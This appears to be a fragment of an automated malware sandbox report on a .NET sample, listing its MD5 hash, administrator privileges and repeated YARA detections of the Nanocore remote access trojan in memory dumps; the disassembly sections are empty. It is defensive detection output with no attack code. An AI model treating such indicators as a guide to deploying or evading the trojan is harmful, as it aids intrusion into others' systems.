                            MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000000.290807365.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000000.290807365.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000000F.00000000.290807365.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000000.291533940.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000000.291533940.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000000F.00000000.291533940.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000000.292171904.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000000.292171904.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000000F.00000000.292171904.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000000.291180768.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000000.291180768.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000000F.00000000.291180768.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:moderate

                            Disassembly

                            Code Analysis

                            Reset < >